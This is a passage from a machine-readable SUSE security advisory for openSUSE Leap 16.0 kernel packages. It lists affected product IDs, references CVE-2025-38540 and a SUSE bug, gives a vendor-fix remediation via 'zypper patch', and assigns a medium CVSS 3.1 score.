"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38540",
"url": "https://www.suse.com/security/cve/CVE-2025-38540"
},
{
"category": "external",
"summary": "SUSE Bug 1248208 for CVE-2025-38540",
"url": "https://bugzilla.suse.com/1248208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
